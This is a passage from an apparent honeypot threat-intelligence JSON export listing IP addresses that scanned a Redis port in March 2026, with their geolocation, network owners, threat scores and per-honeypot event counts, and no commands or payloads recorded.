      "threat_score": 11.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-19T10:22:16+00:00",
        "last_seen_30d": "2026-03-19T10:23:22.380000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "85.217.149.18": {
      "attack_count": 10,
      "first_seen": "2026-03-18T15:14:54.000Z",
      "last_seen": "2026-03-18T15:15:59.682Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Beauharnois",
      "asn": 209334,
      "as_org": "Modat B.V.",
      "threat_score": 89.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.2,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 334,
        "days_active_30d": 29,
        "ports_targeted_30d": 185,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T14:30:00.496000+00:00",
        "last_seen_30d": "2026-03-31T09:16:54.284000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 187,
        "Honeytrap": 142,
        "Redishoneypot": 3,
        "Dionaea": 2
      }
    },
    "135.235.236.63": {
      "attack_count": 9,
      "first_seen": "2026-03-08T23:32:14.000Z",
      "last_seen": "2026-03-08T23:33:23.095Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Pune",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-08T23:32:14+00:00",
        "last_seen_30d": "2026-03-08T23:33:23.095000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "147.185.132.225": {
      "attack_count": 9,
      "first_seen": "2026-03-23T06:50:31.000Z",
      "last_seen": "2026-03-23T06:52:12.020Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 81.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.3,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 107,
        "days_active_30d": 27,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-03T16:21:43.010000+00:00",
        "last_seen_30d": "2026-03-29T04:12:34.476000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 68,
        "Honeytrap": 25,
        "Mailoney": 5,
        "Cowrie": 4,
        "Redishoneypot": 3,
        "Dicompot": 1,
        "Tanner": 1
      }
    },
    "172.236.35.120": {
      "attack_count": 9,
      "first_seen": "2026-03-14T14:28:06.000Z",
      "last_seen": "2026-03-14T14:29:09.369Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Melbourne",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 32.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 2876,
        "days_active_30d": 1,
        "ports_targeted_30d": 1509,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-14T14:27:47+00:00",
        "last_seen_30d": "2026-03-14T14:38:08.829000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1522,
        "Honeytrap": 1323,
        "Dionaea": 9,
        "ConPot": 8,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "Redishoneypot": 2,
        "Sentrypeer": 1
      }
    },
    "198.235.24.41": {
      "attack_count": 9,
      "first_seen": "2026-03-11T03:59:38.000Z",
      "last_seen": "2026-03-11T04:01:20.541Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 89.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.5,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 111,
        "days_active_30d": 29,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T03:48:22+00:00",
        "last_seen_30d": "2026-03-31T00:52:59.091000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 70,
        "Honeytrap": 34,
        "Redishoneypot": 3,
        "Cowrie": 2,
        "Dionaea": 2
      }
    },
    "198.235.24.57": {
      "attack_count": 9,
      "first_seen": "2026-03-28T04:12:48.000Z",
      "last_seen": "2026-03-28T04:14:25.325Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 82.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.6,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 73,
        "days_active_30d": 26,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-05T02:05:14+00:00",
        "last_seen_30d": "2026-03-30T08:35:53.393000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 47,
        "Honeytrap": 20,
        "Redishoneypot": 3,
        "ConPot": 2,
        "Honeyaml": 1
      }
    },
    "204.216.147.144": {
      "attack_count": 9,
      "first_seen": "2026-03-03T04:07:31.000Z",
      "last_seen": "2026-03-03T04:08:42.676Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Vinhedo",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 7.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 29231,
        "days_active_30d": 1,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T02:38:10+00:00",
        "last_seen_30d": "2026-03-03T04:23:11.555000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20580,
        "Honeytrap": 8646,
        "Cowrie": 2,
        "Redishoneypot": 2,
        "Miniprint": 1
      }
    },
    "205.210.31.202": {
      "attack_count": 9,
      "first_seen": "2026-03-14T23:43:19.000Z",
      "last_seen": "2026-03-14T23:44:56.448Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 78.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.3,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 107,
        "days_active_30d": 28,
        "ports_targeted_30d": 32,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T01:58:09+00:00",
        "last_seen_30d": "2026-03-31T09:00:13.838000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 73,
        "Honeytrap": 31,
        "Redishoneypot": 3
      }
    },
    "79.124.58.146": {
      "attack_count": 9,
      "first_seen": "2026-03-14T23:30:28.000Z",
      "last_seen": "2026-03-14T23:31:35.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Bulgaria",
      "country_code": "BG",
      "city": null,
      "asn": 50360,
      "as_org": "Tamatiya EOOD",
      "threat_score": 68.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 12993,
        "days_active_30d": 13,
        "ports_targeted_30d": 5121,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-13T19:58:47+00:00",
        "last_seen_30d": "2026-03-25T05:51:59.810000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7764,
        "Honeytrap": 5223,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dionaea": 1
      }
    },
    "123.144.24.254": {
      "attack_count": 8,
      "first_seen": "2026-03-31T06:11:30.000Z",
      "last_seen": "2026-03-31T06:12:48.795Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 17.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T06:11:30+00:00",
        "last_seen_30d": "2026-03-31T06:12:48.795000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 2,
        "Suricata": 1
      }
    },
    "109.199.116.37": {
      "attack_count": 6,
      "first_seen": "2026-03-06T18:13:03.000Z",
      "last_seen": "2026-03-06T18:14:06.960Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Lauterbourg",
      "asn": 51167,
      "as_org": "Contabo GmbH",
      "threat_score": 1.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T18:14:06.960000+00:00",
        "last_seen_30d": "2026-03-06T18:14:06.960000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "60.12.246.145": {
      "attack_count": 6,
      "first_seen": "2026-03-02T15:53:56.000Z",
      "last_seen": "2026-03-02T15:55:01.745Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T15:55:01.745000+00:00",
        "last_seen_30d": "2026-03-02T15:55:01.745000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "9.163.145.211": {
      "attack_count": 6,
      "first_seen": "2026-03-02T14:51:12.000Z",
      "last_seen": "2026-03-02T14:52:13.519Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T14:52:13.519000+00:00",
        "last_seen_30d": "2026-03-02T14:52:13.519000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "103.236.70.21": {
      "attack_count": 5,
      "first_seen": "2026-03-09T00:31:22.000Z",
      "last_seen": "2026-03-09T00:32:29.547Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134768,
      "as_org": "CHINANET SHAANXI province Cloud Base network",
      "threat_score": 2.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-09T00:32:29.547000+00:00",
        "last_seen_30d": "2026-03-09T00:32:29.547000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "106.52.84.198": {
      "attack_count": 5,
      "first_seen": "2026-03-05T15:26:54.000Z",
      "last_seen": "2026-03-05T15:28:02.724Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 1.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T15:28:02.724000+00:00",
        "last_seen_30d": "2026-03-05T15:28:02.724000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "115.190.189.213": {
      "attack_count": 5,
      "first_seen": "2026-03-30T03:22:08.000Z",
      "last_seen": "2026-03-30T03:23:12.122Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 137718,
      "as_org": "Beijing Volcano Engine Technology Co., Ltd.",
      "threat_score": 30.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 8.3,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 10,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T15:38:55.860000+00:00",
        "last_seen_30d": "2026-03-30T03:23:12.122000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7,
        "Tanner": 2
      }
    },
    "120.48.35.163": {
      "attack_count": 5,
      "first_seen": "2026-03-27T03:33:14.000Z",
      "last_seen": "2026-03-27T03:34:20.440Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T03:34:20.440000+00:00",
        "last_seen_30d": "2026-03-27T03:34:20.440000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "137.184.151.141": {
      "attack_count": 5,
      "first_seen": "2026-03-29T06:30:08.000Z",
      "last_seen": "2026-03-29T06:31:09.488Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 7.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-29T06:31:09.488000+00:00",
        "last_seen_30d": "2026-03-29T06:31:09.488000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "157.230.183.183": {
      "attack_count": 5,
      "first_seen": "2026-03-07T04:08:06.000Z",
      "last_seen": "2026-03-07T04:09:44.345Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 8.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.2,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 2,
        "ports_targeted_30d": 21,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T16:11:57.372000+00:00",
        "last_seen_30d": "2026-03-07T04:32:45.878000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21
      }
    },
    "161.35.58.239": {
      "attack_count": 5,
      "first_seen": "2026-03-15T07:02:56.000Z",
      "last_seen": "2026-03-15T07:03:58.952Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 3.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-15T07:03:58.952000+00:00",
        "last_seen_30d": "2026-03-15T07:03:58.952000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "162.243.175.91": {
      "attack_count": 5,
      "first_seen": "2026-03-25T14:41:52.000Z",
      "last_seen": "2026-03-25T14:43:01.338Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 52.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 1914,
        "days_active_30d": 1,
        "ports_targeted_30d": 1896,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-25T11:10:53.359000+00:00",
        "last_seen_30d": "2026-03-25T15:19:34.102000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1872,
        "Honeytrap": 41,
        "Sentrypeer": 1
      }
    },
    "172.234.21.101": {
      "attack_count": 5,
      "first_seen": "2026-03-11T12:40:28.000Z",
      "last_seen": "2026-03-11T12:41:36.732Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Chicago",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 163,
        "days_active_30d": 30,
        "ports_targeted_30d": 152,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T04:59:59.677000+00:00",
        "last_seen_30d": "2026-03-31T14:08:09.399000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 163
      }
    },
    "179.127.11.206": {
      "attack_count": 5,
      "first_seen": "2026-03-03T20:49:52.000Z",
      "last_seen": "2026-03-03T20:50:56.965Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": null,
      "asn": 28209,
      "as_org": "Under Servicos de Internet Ltda",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T20:50:56.965000+00:00",
        "last_seen_30d": "2026-03-03T20:50:56.965000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "182.138.158.254": {
      "attack_count": 5,
      "first_seen": "2026-03-18T03:23:56.000Z",
      "last_seen": "2026-03-18T03:25:03.417Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T03:25:03.417000+00:00",
        "last_seen_30d": "2026-03-18T03:25:03.417000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "195.184.76.157": {
      "attack_count": 5,
      "first_seen": "2026-03-23T16:41:13.000Z",
      "last_seen": "2026-03-23T16:42:20.918Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Warrenton",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 68.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.1,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 129,
        "days_active_30d": 25,
        "ports_targeted_30d": 105,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T04:36:56.147000+00:00",
        "last_seen_30d": "2026-03-26T19:20:05.276000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 115,
        "Honeytrap": 11,
        "Cowrie": 2,
        "Dicompot": 1
      }
    },
    "199.45.154.184": {
      "attack_count": 5,
      "first_seen": "2026-03-19T14:19:49.000Z",
      "last_seen": "2026-03-19T14:20:52.981Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 66.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.4,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 88,
        "days_active_30d": 29,
        "ports_targeted_30d": 77,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T03:29:32.832000+00:00",
        "last_seen_30d": "2026-03-30T14:22:45.323000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 88
      }
    },
    "36.111.32.16": {
      "attack_count": 5,
      "first_seen": "2026-03-28T11:05:53.000Z",
      "last_seen": "2026-03-28T11:06:57.649Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 58466,
      "as_org": "CHINANET Guangdong province network",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T11:06:57.649000+00:00",
        "last_seen_30d": "2026-03-28T11:06:57.649000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "39.106.148.104": {
      "attack_count": 5,
      "first_seen": "2026-03-10T21:56:17.000Z",
      "last_seen": "2026-03-10T21:57:22.123Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T21:57:22.123000+00:00",
        "last_seen_30d": "2026-03-10T21:57:22.123000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "41.89.92.150": {
      "attack_count": 5,
      "first_seen": "2026-03-31T02:03:09.000Z",
      "last_seen": "2026-03-31T02:04:11.854Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Kenya",
      "country_code": "KE",
      "city": "Narok",
      "asn": 36914,
      "as_org": "Kenya Education Network",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T02:04:11.854000+00:00",
        "last_seen_30d": "2026-03-31T02:04:11.854000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.79.98.252": {
      "attack_count": 5,
      "first_seen": "2026-03-27T12:38:42.000Z",
      "last_seen": "2026-03-27T12:39:48.114Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Fremont",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 188,
        "days_active_30d": 30,
        "ports_targeted_30d": 173,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:00:15.954000+00:00",
        "last_seen_30d": "2026-03-31T16:34:29.302000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 188
      }
    },
    "52.20.198.190": {
      "attack_count": 5,
      "first_seen": "2026-03-14T02:49:53.000Z",
      "last_seen": "2026-03-14T02:50:55.068Z",
